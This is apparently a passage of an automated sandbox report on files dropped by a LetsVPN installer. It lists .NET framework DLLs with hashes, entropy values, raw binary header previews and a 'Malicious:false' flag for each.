                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................@.....@.................................p)..O....@..@............... ....`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.970704080069797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:mBLRWbYWAhqWOHlLf2KQcvBZ9LAuDS+ShjmM6IGBkSHN:mB2Oq3b2KZBZTS+ST6nkgN
                                                                                                                                                                                                  MD5:8C374646D6CFE62A64F99AC6883D769C
                                                                                                                                                                                                  SHA1:CC08A69E0618A534B15CA59F90CBD775FC286EB4
                                                                                                                                                                                                  SHA-256:1B1FBF9870296C136AB3EAD15975B2F5B764838FB576A24E002BBCD68B0C1AC7
                                                                                                                                                                                                  SHA-512:AEDA2CD3E7F98B663EEF05B8D160B66E7F0BFEF9628631DB3144241739BB2079B207FCA040087ED76970425F05A61AD74E8C34C284B0628476527AAED8B4A499
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ....................................@..................................)..O....@.................. ....`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956841147765326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iHW4/Wv7hqWOHlLf2KQcvBZ95YuS+ShjmM6IGBkSw:irGtq3b2KZBZwuS+ST6nk3
                                                                                                                                                                                                  MD5:121900FAF0866DA1543E360231896FB5
                                                                                                                                                                                                  SHA1:D2511193D20B2FC38A3CEAA1E6076025AEBDC26B
                                                                                                                                                                                                  SHA-256:BA84F39643E8D9047DE7659D4F754D92D945D89F22B805B0732862CAF25AD315
                                                                                                                                                                                                  SHA-512:2F0B33A4E792CD53BCCA605BF5BB3507ABB6755622D8F51948F03AE201695AE2689CD78DB1E8BDDED596E997653F6966C8A54D52F5085EA25A27C7871615FBC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ............... ....`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010818325491102
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:4vk7hWmCWthqWOHlLf2KQcvBZ9kzS+ShjmM6IGBkSZ:4s7/Pq3b2KZBZWS+ST6nkq
                                                                                                                                                                                                  MD5:FC146383703882794B07AE23F5A7A66E
                                                                                                                                                                                                  SHA1:32ECFBCB81732FA23DAA8E3259D1DAB2BB5F82AB
                                                                                                                                                                                                  SHA-256:56F7B1883AB592EA9E8505E62AA96E58C4F5E1437BCC4CFC53B975AE945EF646
                                                                                                                                                                                                  SHA-512:A3E49D21BC39B6C49B79DB85F2C09A7CB3509021D51EFD4A46A08D1C8A111CF997F8461D9BFD944AB4DF5B7EEFBD6187CCB7242831E2D461F2E5C75E7BB82EAC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................4....@.................................h)..O....@..0............... ....`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Packaging.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):48672
                                                                                                                                                                                                  Entropy (8bit):5.996358920818446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:2xua7db+smzMnSzBt++0YfTF61O+luv5tywq3b2KZBZIS+ST6nkv:2xH7ssKugt+++1luv5tyD3qK2/mB
                                                                                                                                                                                                  MD5:D7EC72C65DE0FFDD7722008425F26B08
                                                                                                                                                                                                  SHA1:38BEC24A3EA5DE5E66C04B86FC532FB1BB9C6E58
                                                                                                                                                                                                  SHA-256:B7DCC93166B69CEBCBE23E459B1307FF828C8DE7909B1C762A403A3F5AC957D7
                                                                                                                                                                                                  SHA-512:B8BEA46B2DCFF31B3867B1642558A2B6B04B832ADB0E8B356FE9A5674B011A47FB411D3075677AC088AB13B4A34166B9B000348F81ED24A12CA61A7C6C1F2ACC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)1............" ..0.................. ........... ...............................h....`.................................S...O....................... ...........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`(...D...........l...6...........................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.685743907435627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JANJdesEvbDYUgmpWrxWNPfWqxWfPthqWOHlLf2KQcvBZ9faGS+ShjmM6IGBkSah:sclTD/yod2rq3b2KZBZrS+ST6nkFh
                                                                                                                                                                                                  MD5:9D42E9C41B33562AFEA35DE7C804C754
                                                                                                                                                                                                  SHA1:006F54589A5F69913032B66152AE6E82FA9DDBC2
                                                                                                                                                                                                  SHA-256:88572FD2F316A9B3DB0C7ED15F46BF599CC478E0180D3CBFF461F2F3C116B419
                                                                                                                                                                                                  SHA-512:872AC5AFF634EFE5A40B3B9F96E3E2391A553A7D696477602829478E4B62C80D6CA7B54E14708A580CC96B2F2A73657B53FB8443A8C211DC2EB6DA92EB7932FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.[.........." ..0.............Z5... ...@....... ....................................@..................................5..O....@..P............&.. ....`......T4............................................... ............... ..H............text...`.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`.......$..............@..B................;5......H........!...............0..(....3......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2ra..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*B.....(.........*..o....*"..o....*.BSJB............v4.0.30319..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980062550753211
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGMWCUWDhqWOHlLf2KQcvBZ9koEcobKS+ShjmM6IGBkSDR:i3zq3b2KZBZdE5KS+ST6nkER
                                                                                                                                                                                                  MD5:30A53C66C4F7DBA85CEF0AD632D56D1A
                                                                                                                                                                                                  SHA1:1FC2132D66E81FAC944C924C70BC7196728742BB
                                                                                                                                                                                                  SHA-256:E435FC7019E698A9EA77EF2D8C857E206A67F61EA26D54223EE5700A95D85983
                                                                                                                                                                                                  SHA-512:25D9DF05350FE3A03B8C4FBA186E62930CE1943F5AA52A77C60767ACA5B2AD7B99130950149F62410123E704582154EE958EA54AF5A31ED3DE31F2010D39D702
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................-....@.................................@)..O....@.................. ....`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35872
                                                                                                                                                                                                  Entropy (8bit):6.320710151085161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k44bN5hwABzKGUn11fF+1WSq3b2KZBZGS+ST6nkNiT:k5bLhLBzcn1gW93qKA/meT
                                                                                                                                                                                                  MD5:A620A68A1816FDE03C3D7654B8CDE81D
                                                                                                                                                                                                  SHA1:DD84D590F2C2D4D6663B705669E6DA477FFD9284
                                                                                                                                                                                                  SHA-256:38A0922D0F78A6CC5C31A28994ECFA1956E280AA76F24B0D52E4863B08ECA47C
                                                                                                                                                                                                  SHA-512:1FFEF524BDDF5E9F7BDB7489F5EAC5933B305F080303BD315B779DD42FD578CA7CB353ED4C29F41244BE23E4FC89AFE329A27240DFC0087ED881431E1C52D7A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..T...........s... ........... ..............................y.....`..................................r..O....................^.. ............q..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........&...............U..X...`q.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962051100154249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OBhwI7WSQWMhqWOHlLf2KQcvBZ9ZNdS+ShjmM6IGBkSh:ODwIBCq3b2KZBZbS+ST6nkK
                                                                                                                                                                                                  MD5:62AB75D88CC45203A838FA86CAAF189D
                                                                                                                                                                                                  SHA1:2F5A9349B011E54677C30ADD9DDE2E11CF0088D9
                                                                                                                                                                                                  SHA-256:430C25AA7A3D839D77BDAFCC31DDB85670C3E5A6CF7DBD59361A7262466C511E
                                                                                                                                                                                                  SHA-512:0132E274C13147D5B4767345F223882F23D2A4FCB69D708728EF7E8ACF6E2A67814B76F5E508384B15FDA94C2636D98C2C101B5C756459CE611BF815F793E278
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................l(..O....@..P............... ....`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.978691087340885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6yvPRW4lWnhqWOHlLf2KQcvBZ99LZ5S+ShjmM6IGBkSks:/396q3b2KZBZXzS+ST6nk2
                                                                                                                                                                                                  MD5:468045C4B51E0F07C15C5F469F6A362C
                                                                                                                                                                                                  SHA1:DBCF255A9A6C3E2B733988664D64D05373C967BD
                                                                                                                                                                                                  SHA-256:E9DEC41A2F095B3F448CEAE1CBB3D782AEDADBB6E941D0AF7984523E253F0BBD
                                                                                                                                                                                                  SHA-512:97BCC2719C9BECAF1A9BFF8CD597F56A1AE6C148C19DDFFFCD3819BA3B97E6107FFD7D8F76F81E29542DA9BFE73DC36E8DAA42CB51E55A74B6644E828F7856FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................:.....@..................................)..O....@.................. ....`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.925806153080495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n6RW6eWghqWOHlLf2KQcvBZ9SbgnnYOS+ShjmM6IGBkSm:n67Aq3b2KZBZlnnYOS+ST6nkN
                                                                                                                                                                                                  MD5:6EF67383B90630472B4DBE9D61D51D9C
                                                                                                                                                                                                  SHA1:169492A2BE06CC2EA9F476B981DAB0F0F8E35243
                                                                                                                                                                                                  SHA-256:4F28221729A3093D3F3E403EB6121234D69387D902C5026B298BF3CC58074159
                                                                                                                                                                                                  SHA-512:D155F67B9602FCEF1F2EB88648BE5F472FA75E5423360DB3B041B7A512B720743971177254D7D8E8A5F0A8FFF4B4D9D862ACB3E134A1D623F66F2CA94520743B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ..............................t5....@..................................-..O....@.................. ....`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Parallel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.960222514973397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ESUP9W70WhhqWOHlLf2KQcvBZ9mnLF9YS+ShjmM6IGBkSM:hUeRq3b2KZBZsIS+ST6nkT
                                                                                                                                                                                                  MD5:E0ED9475D368E11A5EBF2FEE0DB4AA8D
                                                                                                                                                                                                  SHA1:D8652BBFE2912F6A3B2FC1CD32230A7A8504C3D5
                                                                                                                                                                                                  SHA-256:02A0AA03887A2F13F6993BC1FF589167A72E9233DA9BFEA8D06F39A1F4E3E452
                                                                                                                                                                                                  SHA-512:7561AE8F0C976817C5DACE0F87ED39D35E7B3FF8DD5D7D3DB03472FB6E484B3359C715490BEED3A7E11DC67F3CE0505CB4A5256D79404300C53708BC3F1CF832
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956007202011485
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:58yg07W0/WohqWOHlLf2KQcvBZ9gXsS+ShjmM6IGBkSs:5BHZq3b2KZBZBS+ST6nk7
                                                                                                                                                                                                  MD5:6EBBEFC03F03C1DC559F41D9C11CD702
                                                                                                                                                                                                  SHA1:0F2FA9B0BE3AAD5B36DED4481A1339D811ABAA52
                                                                                                                                                                                                  SHA-256:F90DE9000C6D747B69443B3754E1BA110AC88709A1BC27E88FBB304B63F0B019
                                                                                                                                                                                                  SHA-512:741AF8C09090A289C3D88E5B8D89E9CA6FBD54C1A6E62DCC71A6CF1F8AE40D45C322AB02EA3785BCD07BA8EC89597CE0E2CBDB16010BBBF218AFC925B831CDBC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.926537737305858
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Se1WmRWQhqWOHlLf2KQcvBZ9Mo+JS+ShjmM6IGBkSJ3:Sej3q3b2KZBZPwS+ST6nkc3
                                                                                                                                                                                                  MD5:69C49A0199ECD4366220BD0718C8123F
                                                                                                                                                                                                  SHA1:CCDC0B518FC549DF6DA6C8D4E9E29615EB74B773
                                                                                                                                                                                                  SHA-256:255BF1A913BED63A302FF334A49D3CDA16064E17D032883F517634A6E09CEAF1
                                                                                                                                                                                                  SHA-512:80F90E045F79915C38C8413F16A0F8A15B02F4694FB387FFEBD67A1A7A78369AD2AF6EF64232635EBA972DF8F391117B72F128703EC8F9F6BFC76A836D5B8937
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................O.....@.................................p(..O....@.................. ....`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Management.Automation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366112
                                                                                                                                                                                                  Entropy (8bit):5.913155732487538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4A0HY8o04jatc9MCELK5h+BO2L1fsqF030f0:4A0HYnitRCOFOI1Wv
                                                                                                                                                                                                  MD5:140C261BA8A0CFC9CDF37B9B84D3A5D7
                                                                                                                                                                                                  SHA1:203FB8572956AD08EECB32217A261FE9C084D6AE
                                                                                                                                                                                                  SHA-256:BE6BDEECE5499E95B1C2CD138980171FD762D37CF3CA66807F1D556D497634CA
                                                                                                                                                                                                  SHA-512:BB754F877D0AE780F5BB1F29B966E8B8F14240304B108537319B2212F9B419656E4F75E0CA983092D69CCEC0ABF34F8B6B0A8F720A383C91D809A5CB3C9D8579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;..........." ..0..`...........~... ........... ....................................`.................................?~..O....................h.. ...........\}..T............................................ ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@..@.reloc...............f..............@..B................s~......H.......t|..h....................|........................................('...*..((...*..(#...*..*..*..*.*..(....*..(....*..(....*..(....*..*.*..(1...*..*..(....*..*..*.*..*.*..*..*..*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*..*..*..*..*..*..*..*.*..()...*..()...*..*.*..*.*..(....*..*..(....*..(....*..(....*..(....*..('...*....Q.*..(....*..*.*..*.*..*.*..*.*..*.*..('...*..((...*..*.*..*.*..*.*..('...*..('...*..*..*.*..*.*..*..*..*..*..*..('...*..*..*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.189282219926361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:kUGrszKKLB8a9DvrJeeesIf3amN32AW/rcesL/R:nB8l3/aK32Bc
                                                                                                                                                                                                  MD5:A4C44C10DD8CF211B874DF927FC6982E
                                                                                                                                                                                                  SHA1:C6B01D97636D3D2555754D09BAA00B01029A3B49
                                                                                                                                                                                                  SHA-256:94EE25A9E39BB2CC16A21340F4E18B1D19F32DE920A9233754F4A84142122CBB
                                                                                                                                                                                                  SHA-512:0499CCF78F79E4A0D8A71F201471F17181B6C2A35048D219F7F689029FAEF9AEA71D89DCAB8E8A8CB719413D364623D1B7FE2D8FE1DC7D7A3EAA0AC3886A3A9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`.......6....@.................................`...O.... ..@............... ....@......(................................................ ............... ..H............text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
